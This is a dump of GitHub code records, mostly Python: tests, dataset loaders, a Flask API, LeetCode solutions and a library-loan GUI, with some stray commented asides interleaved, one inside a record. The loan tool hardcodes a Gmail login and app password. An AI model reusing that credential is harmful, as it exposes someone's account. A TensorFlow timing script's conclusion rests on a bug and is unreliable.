self.assertEqual(rk, expect_result)\n\n def test_2_ranklist_plugin(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n rk.plugin(add_profit)\n rk.plugin(add_userinfotmation)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n\n rk.push_in(user_1)\n\n expect_result = [{\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n }, ]\n self.assertEqual(rk.top(), expect_result)\n\n expect_result = {\n \"1002922\": {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n }\n }\n self.assertEqual(rk, expect_result)\n\n def test_3_ranklist_add_rank(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n rk.plugin(add_profit)\n rk.plugin(add_userinfotmation)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n\n rk.push_in(user_1)\n rk.sort_by(\"profit\").add_rank()\n\n expect_result = [{\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n \"rank\": \"1\",\n }, ]\n self.assertEqual(rk.top(), expect_result)\n\n expect_result = {\n \"1002922\": {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n \"rank\": \"1\",\n }\n }\n self.assertEqual(rk, expect_result)\n\n def test_4_ranklist_add_gift(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n rk.plugin(add_profit)\n rk.plugin(add_userinfotmation)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n 
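# Illustrative aside, separate from the dataset records around it: a minimal,
# self-contained sketch of the constrained weight search used in
# EnsembleModels.predict above (SLSQP, weights forced to sum to 1). The data and
# names below are made up for the demo, not taken from any record in this file.
import numpy as np
from scipy.optimize import minimize

truth = np.array([1.0, 2.0, 3.0, 4.0])
forecasts = np.stack([truth + 0.5, truth - 0.3], axis=1)   # two biased "models"

rmse = lambda w: np.sqrt(np.mean((truth - forecasts @ w) ** 2))   # objective
cons = ({'type': 'eq', 'fun': lambda w: w.sum() - 1},)            # sum-to-1 constraint
w0 = np.full(forecasts.shape[1], 1.0 / forecasts.shape[1])        # start from equal weights

res = minimize(rmse, w0, method='SLSQP', constraints=cons)
print(res.x)   # ~[0.375, 0.625]: the opposite biases cancel at this mix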
\"uid\": 1002922\n }\n user_2 = {\n \"gold\": 220,\n \"prize\": 520,\n \"uid\": 1002923\n }\n user_3 = {\n \"gold\": 120,\n \"prize\": 320,\n \"uid\": 1002924\n }\n\n rk.push_in(user_1)\n rk.push_in(user_2)\n rk.push_in(user_3)\n rk.sort_by(\"profit\").add_rank().add_gift(rank_prize_data)\n\n expect_result = [\n {'username': 'jack',\n 'prize': 520,\n 'gold': 220,\n 'profit': 300,\n 'gift': {'name': 'iPhone'},\n 'rank': '1',\n 'uid': '1002923'\n },\n {'username': 'pig',\n 'prize': 320,\n 'gold': 120,\n 'profit': 200,\n 'gift': {'name': 'iPod'},\n 'rank': '2',\n 'uid': '1002924'\n }\n ]\n self.assertEqual(rk.top(2), expect_result)\n\n def test_5_ranklist_add_trend(self):\n redis_key = 'last_ranklist_cache:{}'.format(random.randint(1, 1000))\n rk = Ranklist(redis_key, self.redis_connect)\n rk.plugin(add_profit)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n\n user_2 = {\n \"gold\": 120,\n \"prize\": 320,\n \"uid\": 1002924\n }\n rk.push_in(user_1)\n rk.push_in(user_2)\n\n expect_result = [\n {'trend': '1',\n 'prize': 320,\n 'gold': 120,\n 'profit': 200,\n 'rank': '1',\n 'uid': '1002924'\n },\n {'trend': '1',\n 'prize': 220,\n 'gold': 120,\n 'profit': 100,\n 'rank': '2',\n 'uid': '1002922'\n }\n ]\n rk.sort_by(\"profit\").add_rank().add_trend()\n self.assertEqual(rk.top(), expect_result)\n # after a while ...\n time.sleep(2)\n user_1 = {\n \"gold\": 220,\n \"prize\": 620,\n \"uid\": 1002922\n }\n user_2 = {\n \"gold\": 120,\n \"prize\": 320,\n \"uid\": 1002924\n }\n\n # simulator come in again ...\n print('redis key ={}'.format(redis_key))\n rk2 = Ranklist(redis_key, self.redis_connect)\n rk2.plugin(add_profit)\n rk2.push_in(user_1)\n rk2.push_in(user_2)\n expect_result = [\n {'trend': '1',\n 'prize': 620,\n 'gold': 220,\n 'profit': 400,\n 'rank': '1',\n 'uid': '1002922'\n },\n {'trend': '-1',\n 'prize': 320,\n 'gold': 120,\n 'profit': 200,\n 'rank': '2',\n 'uid': '1002924'\n }\n\n ]\n rk2.sort_by(\"profit\").add_rank().add_trend()\n self.assertEqual(rk2.top(), expect_result)\n\n def test_6_plugin_install(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n with self.assertRaises(RuntimeError):\n \trk.push_in(user_1)\n \trk.plugin(add_profit)\n\n\n def tearDown(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"land-pack/landport","sub_path":"tests/test_core_ranklist.py","file_name":"test_core_ranklist.py","file_ext":"py","file_size_in_byte":6666,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"24641273625","text":"from torch.utils.data import Dataset\nfrom PIL import Image\nfrom utils import data_utils\nimport torch\nfrom torchvision import transforms\nimport PIL\nimport numpy as np\n\nclass InferenceDataset(Dataset):\n\n\tdef __init__(self, root, opts, transform=None):\n\t\tself.paths = sorted(data_utils.make_dataset(root))\n\t\tself.transform = transform\n\t\tself.opts = opts\n\n\tdef __len__(self):\n\t\treturn len(self.paths)\n\n\tdef __getitem__(self, index):\n\t\tfrom_path = self.paths[index]\n\t\tfrom_im = Image.open(from_path)\n\t\tfrom_im = from_im.convert('RGB') if self.opts.label_nc == 0 else from_im.convert('L')\n\t\tif self.transform:\n\t\t\tfrom_im = self.transform(from_im)\n\t\treturn from_im\n\ndef ToTensor(pic):\n # handle PIL Image\n if pic.mode == 'I':\n img = torch.from_numpy(np.array(pic, np.int32, copy=False))\n elif pic.mode == 'I;16':\n img = 
torch.from_numpy(np.array(pic, np.int16, copy=False))\n else:\n img = torch.ByteTensor(torch.ByteStorage.from_buffer(pic.tobytes()))\n # PIL image mode: 1, L, P, I, F, RGB, YCbCr, RGBA, CMYK\n if pic.mode == 'YCbCr':\n nchannel = 3\n elif pic.mode == 'I;16':\n nchannel = 1\n else:\n nchannel = len(pic.mode)\n img = img.view(pic.size[1], pic.size[0], nchannel)\n # put it from HWC to CHW format\n # yikes, this transpose takes 80% of the loading time/CPU\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n if isinstance(img, torch.ByteTensor):\n return img.float()\n else:\n return img\n\t\t\nclass InferenceDataset_enc(Dataset):\n\n\tdef __init__(self, root_1, root_2, transform_1=None, transform_2=None, opts=None):\n\t\tself.paths_1 = sorted(data_utils.make_dataset(root_1))\n\t\tself.paths_2 = sorted(data_utils.make_dataset(root_2))\n\t\tself.transform_1 = transform_1\n\t\tself.transform_2 = transform_2\n\n\t\tself.opts = opts\n\n\tdef __len__(self):\n\t\treturn len(self.paths_1)\n\n\tdef __getitem__(self, index):\n\t\tfrom_path = self.paths_1[index]\n\t\tfrom_im = Image.open(from_path)\n\n\t\tfrom_im = from_im.convert('RGB') if self.opts.label_nc == 0 else from_im.convert('L')\n\n\t\tto_path = self.paths_2[index]\n\t\tto_im = Image.open(to_path).convert('RGB')\n\n\t\tif self.transform_1:\n\t\t\tfrom_im = self.transform_1(from_im)\n\t\tif self.transform_2:\n\t\t\tto_im = self.transform_2(to_im)\n\t\treturn from_im, to_im\n\n\n\n\n\n","repo_name":"zsl2018/StyleAnime","sub_path":"datasets/inference_dataset.py","file_name":"inference_dataset.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"79"} +{"seq_id":"33585720090","text":"def getserial():\n # Extract serial from cpuinfo file\n cpuserial = \"0000000000000000\"\n try:\n f = open('/proc/cpuinfo','r')\n for line in f:\n if line[0:6]=='Serial':\n cpuserial = line[10:26]\n f.close()\n except:\n cpuserial = \"ERROR000000000\"\n\n return cpuserial\n\nif __name__ == '__main__':\n serial = getserial()\n print(serial)","repo_name":"Team-Mask-On/Mask_On","sub_path":"rpi/get_serial_number.py","file_name":"get_serial_number.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"79"} +{"seq_id":"27858828356","text":"import flask\nfrom flask import request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom flask import json\n\nfrom salescanner.services.ad_item_service import AdItemService\n\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\nCORS(app)\n\n\n@app.route('/api', methods=['GET'])\ndef home():\n return jsonify({'msg': 'Hello to SaleScanner!'})\n\n\n@app.route('/api/ads/list', methods=['PUT'])\ndef get_ads():\n query = request.json.get('query', '')\n order_by = request.args.get('order_by')\n\n page = request.args.get('page')\n if page is not None:\n page = int(page)\n size = request.args.get('page_size')\n if size is not None:\n size = int(size)\n\n ads = AdItemService.list_ads(query, order_by, page, size)\n return jsonify(ads)\n\n\n@app.route('/api/ads/count', methods=['GET'])\n@cross_origin()\ndef count_ads():\n count = AdItemService.count_ads()\n return jsonify({'count': count})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', 
threaded=True)\n","repo_name":"ZdravkoHvarlingov/sale-scanner","sub_path":"salescanner/rest/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"70839476736","text":"#\n# @lc app=leetcode.cn id=1991 lang=python3\n#\n# [1991] Find the Middle Index in Array\n#\n# https://leetcode.cn/problems/find-the-middle-index-in-array/description/\n#\n# algorithms\n# Easy (64.86%)\n# Likes: 25\n# Dislikes: 0\n# Total Accepted: 14K\n# Total Submissions: 21.6K\n# Testcase Example: '[2,3,-1,8,4]'\n#\n# Given a 0-indexed integer array nums, find the leftmost middleIndex (i.e. the smallest of all possible middle indices).\n#\n# A middleIndex is an index satisfying nums[0] + nums[1] + ... + nums[middleIndex-1] ==\n# nums[middleIndex+1] + nums[middleIndex+2] + ... + nums[nums.length-1].\n#\n# If middleIndex == 0, the left-hand sum is defined to be 0. Likewise, if middleIndex == nums.length - 1,\n# the right-hand sum is defined to be 0.\n#\n# Return the leftmost middleIndex satisfying the condition, or -1 if no such index exists.\n#\n# Example 1:\n# Input: nums = [2,3,-1,8,4]\n# Output: 3\n# Explanation:\n# The sum of the numbers before index 3 is: 2 + 3 + -1 = 4\n# The sum of the numbers after index 3 is: 4 = 4\n#\n# Example 2:\n# Input: nums = [1,-1,4]\n# Output: 2\n# Explanation:\n# The sum of the numbers before index 2 is: 1 + -1 = 0\n# The sum of the numbers after index 2 is: 0\n#\n# Example 3:\n# Input: nums = [2,5]\n# Output: -1\n# Explanation: no middleIndex satisfies the requirement.\n#\n# Example 4:\n# Input: nums = [1]\n# Output: 0\n# Explanation:\n# The sum of the numbers before index 0 is: 0\n# The sum of the numbers after index 0 is: 0\n#\n# Constraints:\n#\n# 1 <= nums.length <= 100\n# -1000 <= nums[i] <= 1000\n#\n# Note: this problem is the same as problem 724 on the main site: https://leetcode-cn.com/problems/find-pivot-index/\n#\n\n# @lc code=start\nclass Solution:\n    # 294: 97.93%(28ms) 5.58%(15.1MB);\n    def findMiddleIndex(self, nums: List[int]) -> int:\n        size = len(nums)\n        preSum = [0] * (size+1)\n        for i in range(size):\n            preSum[i+1] = preSum[i] + nums[i] # preSum[i+1] includes nums[i]\n        total = preSum[size]\n        for i in range(size):\n            if preSum[i] == total - preSum[i+1]: # sum(0..i-1) == sum(i+1..size-1)\n                return i\n        return -1\n# @lc code=end\n\n","repo_name":"hummingg/LeetCode","sub_path":"python/1991.找到数组的中间位置.py","file_name":"1991.找到数组的中间位置.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"72530390655","text":"# -*- coding: utf-8 -*- \n# leetcode time cost : 32 ms\n# leetcode memory cost : 13.5 MB\n# solution 2, math\n# G(n) = Catalan number C_n, with C_0 = 1 and C_(n+1) = 2*(2n+1)/(n+2) * C_n\nclass Solution(object):\n    def numTrees(self, n: int) -> int:\n        C = 1\n        for i in range(0, n):\n            C = C * 2*(2*i+1)/(i+2)\n        return int(C)\n\ndef main():\n    num = 3 #expect is 5\n    obj = Solution()\n    result = obj.numTrees(num)\n    print(\"return result is :\",result)\n    \nif __name__ =='__main__':\n    main() ","repo_name":"sky-dream/LeetCodeProblemsStudy","sub_path":"[0096][Medium][Unique_Binary_Search_Trees]/Unique_Binary_Search_Trees_2.py","file_name":"Unique_Binary_Search_Trees_2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"71223766655","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n\n    ENVIRONMENT = os.getenv('ENVIRONMENT')\n\n    if ENVIRONMENT == 'STAGING':\n        settings = 'staging'\n    elif ENVIRONMENT == 'PRODUCTION':\n        settings = 'production'\n    else:\n        settings = 'development'\n\n    os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",\n                          \"hangman.settings.{settings}\".format(settings=settings))\n\n    from django.core.management import execute_from_command_line\n\n
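# Illustrative aside, separate from the dataset records around it: a worked run of
# the prefix-sum trick used in findMiddleIndex above. preSum[i] holds sum(nums[0..i-1]),
# so each left/right balance check costs O(1). The values below are the problem's
# first example, reproduced here only for demonstration.
nums = [2, 3, -1, 8, 4]
preSum = [0]
for v in nums:
    preSum.append(preSum[-1] + v)            # preSum == [0, 2, 5, 4, 12, 16]
total = preSum[-1]
middle = next((i for i in range(len(nums))
               if preSum[i] == total - preSum[i + 1]), -1)
print(middle)                                 # 3: left sum 4 == right sum 4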
execute_from_command_line(sys.argv)\n","repo_name":"jpadilla/email-hangman","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"1413866231","text":"from bisect import bisect_right as upper_bound\n\ndef findMedian(A):\n R = len(A)\n C = len(A[0])\n mi = A[0][0]\n mx = 0\n for i in range(R):\n if (A[i][0] < mi):\n mi = A[i][0]\n if (A[i][C - 1] > mx):\n mx = A[i][C - 1]\n\n desired = (R * C + 1) / 2\n while(mi < mx):\n mid = mi + (mx - mi) // 2\n place = [0]\n\n for i in range(R):\n j = upper_bound(A[i], mid)\n place[0] = place[0] + j\n if (place[0] < desired):\n mi = mid + 1\n else:\n mx = mid\n return mi\n\n\narr=[[1, 3, 5],[2, 6, 9],[3, 6, 9]]\np= findMedian(arr)\nprint(p)\n","repo_name":"tanu312000/pyChapter","sub_path":"org/netsetos/pyprep/ib/BinarySearch/matrix_median1.py","file_name":"matrix_median1.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21511480145","text":"from datetime import date\nrecipe_dict = {\n 'ehsf': [2161, 138, 154, 61],\n 'csf': [4000, 315, 153, 501],\n 'chili': [3567, 265, 146, 311],\n 'bs': [3510.280, 145, 271],\n 'gccs': [3316, 328, 82, 295],\n 'ss': [3869, 282, 134, 380],\n 'sj': [5841, 352, 138, 788],\n 'gsq': [2951, 298, 99, 314],\n 'ccc': [2805, 100, 51, 484],\n 'zb': [5177, 70, 244, 688],\n 'bb': [3024, 50, 109, 482]\n}\n\n\ntoday = date.today()\n\nhave_not_eaten_yet = {\n 'day': today,\n 'calories': 0,\n 'protein': 0,\n 'fats': 0,\n 'carbs': 0\n}\n\nclass person:\n def __init__(self, name, daily_weight, daily_macros, switch):\n self.name = name\n self.weight = daily_weight\n self.daily_macros = daily_macros\n self.switch = switch\n with open(\"{}_seven_day\".format(self.name),'r') as fptr:\n self.seven_day = fptr.readlines()\n #self.seven_day = [str(float(daily_weight)) + '\\n'] * 7\n #with open(\"{}_seven_day\".format(self.name), 'w') as fptr:\n #fptr.write(''.join(self.seven_day))\n \nMarshall = person(\"stormcount20\", 185, have_not_eaten_yet, 0)\nJosie = person(\"NoniRex\", 195, have_not_eaten_yet,0)\n\nperson_dict = {'stormcount20': Marshall, 'NoniRex': Josie}\n","repo_name":"b2marshall/fitbot","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70370046337","text":"from django import forms\n\nfrom .models import challengePost, challengeComment\n\n\nclass challengeCreateForm(forms.Form):\n title = forms.CharField(\n widget=forms.TextInput(\n attrs={\n 'class': 'form-control-file',\n }\n )\n )\n\n text = forms.CharField(\n widget=forms.Textarea(\n attrs={\n 'class': 'form-control-file',\n }\n )\n )\n\n def save(self, *args, **kwargs):\n post = challengePost.objects.create(\n title=self.cleaned_data['title'],\n text=self.cleaned_data['text'],\n **kwargs,\n )\n\n return post\n\n\nclass challengeCommentForm(forms.ModelForm):\n class Meta:\n model = challengeComment\n fields = [\n 'content',\n\n ]\n widgets = {\n 'content': forms.Textarea(\n attrs={\n 'class': 'form-control',\n 'rows': 2,\n }\n )\n }\n","repo_name":"jeonyh0924/NBAproject","sub_path":"app/challengepost/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 
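# Illustrative aside, separate from the dataset records around it: the findMedian
# routine a few records above binary-searches on the *value* rather than an index.
# For a candidate mid it counts, row by row with bisect_right (upper_bound), how many
# entries are <= mid, and keeps the smallest value whose count reaches (R*C+1)//2.
# A compact, self-contained check of that counting step on the same matrix:
from bisect import bisect_right

rows = [[1, 3, 5], [2, 6, 9], [3, 6, 9]]
count_le = lambda v: sum(bisect_right(row, v) for row in rows)
print(count_le(5))   # 5 entries <= 5, and (3*3 + 1)//2 == 5, so the median is 5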
+{"seq_id":"3137677244","text":"__author__ = '562474'\n\nfrom troposphere.ec2 import VolumeAttachment,Volume,Instance\nfrom troposphere import AWS_REGION,FindInMap, Ref, GetAtt,constants\n\nimport mappings\n\n\ndef volumeAttachment_helper(volume,instance, device='/dev/xvdb'):\n\n return VolumeAttachment(volume.title+\"Attachment\",\n InstanceId=Ref(instance),\n VolumeId=Ref(volume),\n Device=device)\n\n\ndef create_and_attach_volume(template,title, instance,device='/dev/xvdb', **kwargs):\n \n # if 'VolumeType' not in kwargs:\n # kwargs['VolumeType']=\"gp2\"\n if 'Size' not in kwargs:\n kwargs['Size']=str(20)\n if type(kwargs['Size']) is not basestring:\n kwargs['Size']=str(kwargs['Size'])\n if 'AvailabilityZone' not in kwargs:\n kwargs['AvailabilityZone'] = GetAtt(instance,'AvailabilityZone')\n v = template.add_resource(Volume(instance.title+title,**kwargs ))\n return template.add_resource(volumeAttachment_helper(v,instance,device))\n\n","repo_name":"Israt-Sharmin/Jenkins-elk","sub_path":"cf_scripts/template_helpers.py","file_name":"template_helpers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31414542989","text":"class Solution:\n def minimumSum(self, num: int) -> int:\n # get the four digits\n digit1=num%10\n digit2=int(num%100/10) # int() can round down\n digit3=int(num%1000/100)\n digit4=int(num%10000/1000)\n \n # combination\n # as the expected output is only the min sum, no need to get all the combinations. Only get the pair which can give the min sum\n\n # put the four digits in a list and sort them\n digitList= [digit1, digit2, digit3, digit4] \n digitList.sort() # ascending order\n\n # the two smallest digits will be on the ten's digit\n num1=10*digitList[0]+digitList[2]\n num2=10*digitList[1]+digitList[3] \n\n\n return num1+num2\n\n\n\nsol=Solution()\nprint(sol.minimumSum(4009))\n","repo_name":"HuachenZH/Python_leet","sub_path":"Math/2160.py","file_name":"2160.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71906229695","text":"'''\nWill tensorflow merge two calculation nodes into one?\nExample: tf.log(tf.sigmoid(x)) = - tf.nn.softplus(-x)\nAuthor: Li-Ping Liu \n'''\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport time\n\n# allocate an np array \nsize = int(1e5)\nscale = 10 # if scale is large enough, log(sigmoid(X)) will fail\nnpX = (np.random.rand(size) - 0.5) * scale \n\n# calculate log(sigmoid(X)) in two different ways \nX = tf.constant(npX)\nY1 = tf.log(tf.sigmoid(X))\nY2 = - tf.nn.softplus(- X)\n\n\n# computation\nsession = tf.Session()\n\n# calculation with graph log(sigmoid(x))\nt1_start = time.clock()\n\nnpY1 = session.run(Y1)\n\nt1_calculation = time.clock() - t1_start\nprint(\"Calculation of log(sigmoid(X)) takes time %f seconds.\" % t1_calculation)\n\n\n# calculation with graph - softplus(- x)\nt2_start = time.clock()\n\nnpY2 = session.run(Y1)\n\nt2_calculation = time.clock() - t2_start\nprint(\"Calculation of - softplus(-X) takes time %f seconds.\" % t2_calculation)\n\nprint(npY1.shape)\nprint(np.argmax(npY1 - npY2))\n\nprint(np.mean(np.abs(npY1 - npY2)))\n\n# conclusion: tensorflow will not merge nodes in computational 
graph\n","repo_name":"lipingliulp/benchmark-tensorflow","sub_path":"merge_computation.py","file_name":"merge_computation.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12187773534","text":"import PySimpleGUI as sg\nimport sys\nimport re\nimport pandas as pd\nimport smtplib\nfrom smtplib import SMTPException\n\n\ndef cadastrar_usuario(nome, email):\n # Cria um DataFrame com os dados do usuário\n df_usuario = pd.DataFrame({\"Nome\": [nome.lower()],\n \"Email\": [email.lower()]})\n\n # Carrega a planilha existente ou cria um novo arquivo\n try:\n df_planilha = pd.read_excel(\"usuarios.xlsx\")\n df_planilha = pd.concat([df_planilha, df_usuario], ignore_index=True)\n except FileNotFoundError:\n df_planilha = df_usuario\n\n # Salva os dados na planilha\n df_planilha.to_excel(\"usuarios.xlsx\", index=False)\n\n\ndef validar_email(email):\n # Expressão regular para validar o formato do e-mail\n padrao_email = r\"[^@]+@[^@]+\\.[^@]+\"\n return re.match(padrao_email, email) is not None\n\n\ndef verificar_usuario(nome, email):\n # Função para verificar cadastro\n try:\n # Carregar planilha\n df_planilha = pd.read_excel(\"usuarios.xlsx\")\n # Verificar se o usuario está presente na planilha\n usuario_encontrado = df_planilha[(df_planilha[\"Nome\"] == nome.lower())\n & (df_planilha[\"Email\"] ==\n email.lower())]\n if not usuario_encontrado.empty:\n return True\n except FileNotFoundError:\n pass\n\n\ndef verificar_usuario_cadastrado(nome, email):\n try:\n df_planilha = pd.read_excel(\"usuarios.xlsx\")\n usuario_encontrado = df_planilha[\n (df_planilha[\"Nome\"] == nome.lower()) &\n (df_planilha[\"Email\"] == email.lower())\n ]\n return not usuario_encontrado.empty\n except FileNotFoundError:\n return False\n\n\n# Função para enviar e-mails\ndef enviar_email(destinatario, assunto, corpo):\n # Configurações do remetente e servidor SMTP\n remetente = \"projetofinal.python@gmail.com\"\n senha = \"ozcgrtuowtzcnuka\"\n servidor_smtp = \"smtp.gmail.com\"\n porta_smtp = 587\n\n # Constrói a mensagem de e-mail\n mensagem = (f\"Subject: {assunto}\\n\\n{corpo}\")\n\n try:\n # Estabelece uma conexão com o servidor SMTP\n with smtplib.SMTP(servidor_smtp, porta_smtp) as servidor:\n # Inicia a criptografia da conexão\n servidor.starttls()\n\n # Realiza a autenticação no servidor\n servidor.login(remetente, senha)\n\n # Codifica a mensagem para utf-8\n mensagem = mensagem.encode(\"utf-8\")\n\n # Envia o e-mail\n servidor.sendmail(remetente, destinatario, mensagem)\n\n # Exibe mensagem de sucesso\n print(\"Email enviado com sucesso!\")\n\n except SMTPException as erro:\n # Trata exceções que possam ocorrer durante o envio\n print(f\"Erro ao enviar email: {erro}\")\n\n\ndef devolver_livro(nome, email):\n # Lê o arquivo \"usuarios.xlsx\" e verifica se há informações de livro\n # relacionadas ao usuário atual\n arquivo_excel = \"usuarios.xlsx\"\n planilha_nome = \"Sheet1\"\n df = pd.read_excel(arquivo_excel, sheet_name=planilha_nome)\n\n # Filtra as linhas do usuário atual\n linhas_usuario = df.loc[(df['Nome'] == nome) & (df['Email'] == email)]\n\n if len(linhas_usuario) == 0 or pd.isna(linhas_usuario['Título'].iloc[0]):\n sg.popup(\"Você não possui nenhum livro para devolver.\")\n return\n\n livros_a_devolver = []\n\n for index, row in linhas_usuario.iterrows():\n titulo = row['Título']\n autor = row['Autor']\n data = row['Data']\n genero = row['Gênero']\n\n livros_a_devolver.append(index)\n\n if 
len(livros_a_devolver) > 0:\n df.loc[livros_a_devolver,\n ['Título', 'Autor', 'Data', 'Gênero']] = ''\n df.to_excel(arquivo_excel, sheet_name=planilha_nome, index=False)\n else:\n sg.popup(\"Nenhum livro selecionado para devolver.\",\n keep_on_top=True, non_blocking=True)\n\n # Cria a janela para exibir as informações do livro e a opção de \"Devolver\"\n layout_devolucao = [\n [sg.Text(f\"Título: {titulo}\")],\n [sg.Text(f\"Autor: {autor}\")],\n [sg.Text(f\"Data: {data}\")],\n [sg.Text(f\"Gênero: {genero}\")],\n [sg.Button(\"Devolver\")],\n [sg.Button(\"Cancelar\")],\n ]\n\n janela_devolucao = sg.Window(\"Devolver Livro\", layout_devolucao,\n resizable=False, finalize=True)\n\n while True:\n evento, _ = janela_devolucao.read()\n if evento == sg.WINDOW_CLOSED or evento == \"Cancelar\":\n break\n\n if evento == \"Devolver\":\n # Remove as informações do livro do arquivo \"usuarios.xlsx\"\n filtro = (df['Nome'] == nome) & (df['Email'] == email)\n colunas = ['Título', 'Autor', 'Data', 'Gênero']\n # Atribui valores vazios às células correspondentes\n df.loc[filtro, colunas] = ''\n\n df.to_excel(arquivo_excel, sheet_name=planilha_nome, index=False)\n\n # enviar_email de aviso de devolução\n corpo_dev = f\"O livro {titulo}, foi devolvido com sucesso\"\n destinatario_dev = email\n enviar_email(destinatario_dev, \"Livro devolvido\", corpo_dev)\n\n sg.popup(\"Livro devolvido com sucesso!\",\n keep_on_top=True, non_blocking=True)\n sys.exit()\n\n janela_devolucao.close()\n\n\ndef adicionar_livro_escolhido(nome, email, titulo, autor, data, genero):\n # Cria um DataFrame com as informações do livro\n livro = {\n 'Nome': nome,\n 'Email': email,\n 'Título': titulo,\n 'Autor': autor,\n 'Data': data,\n 'Gênero': genero\n }\n\n # Salva o DataFrame na planilha \"usuarios.xlsx\"\n arquivo_excel = \"usuarios.xlsx\"\n planilha_nome = \"Sheet1\"\n\n try:\n df = pd.read_excel(arquivo_excel, sheet_name=planilha_nome)\n # Verifica se já existe uma linha com o mesmo nome e email\n linha_existente = df[(df[\"Nome\"] == nome) & (df[\"Email\"] == email)]\n\n if linha_existente.empty:\n # Adiciona uma nova linha ao DataFrame\n df = pd.concat([df, pd.DataFrame([livro])], ignore_index=True)\n\n else:\n # Atualiza a linha existente com as informações do livro\n indice = linha_existente.index[0]\n df.loc[indice] = livro\n\n except FileNotFoundError:\n\n df = pd.DataFrame([livro],\n columns=[\"Nome\",\n \"Email\",\n \"Título\",\n \"Autor\",\n \"Data\",\n \"Gênero\"])\n print(\"Arquivo 'usuarios.xlsx' não encontrado.\\\n Verifique se o arquivo existe.\")\n\n df.to_excel(arquivo_excel, sheet_name=planilha_nome, index=False)\n\n\ndef mostrar_informacoes_livro(titulo, autor, data, genero):\n botao_confirma_dev = [\n [sg.Button(\"Devolver\", size=(10, 1))],\n [sg.Button(\"Cancelar\", size=(10, 1))],\n ]\n\n layout_confirma_dev = [\n [sg.Text(f\"Título: {titulo}\")],\n [sg.Text(f\"Autor: {autor}\")],\n [sg.Text(f\"Data: {data}\")],\n [sg.Text(f\"Gênero: {genero}\")],\n [botao_confirma_dev]\n ]\n\n janela_confirma_dev = sg.Window(\"Informações do Livro\",\n layout_confirma_dev, finalize=True,\n resizable=False, size=(500, 150))\n\n while True:\n evento, _ = janela_confirma_dev.read()\n\n if evento == sg.WINDOW_CLOSED or evento == \"Cancelar\":\n janela_confirma_dev.close()\n return False\n elif evento == \"Devolver\":\n enviar_email(\n destinatario=[\"-EMAIL-\"],\n assunto=\"Informações do Livro\",\n corpo=f\"O livro {titulo} foi devolvido com sucesso.\"\n )\n return True\n 
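# Illustrative aside, separate from the funcoes.py record around it: the clearing
# logic above relies on pandas boolean-mask assignment, df.loc[mask, columns] = value,
# which writes in place only where the mask is True. A tiny self-contained sketch of
# that pattern (the frame below is invented for the demo):
import pandas as pd

df = pd.DataFrame({"Nome": ["ana", "bia"], "Título": ["Dom Casmurro", "Iracema"]})
mask = df["Nome"] == "ana"
df.loc[mask, ["Título"]] = ""     # only ana's row is blanked
print(df)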
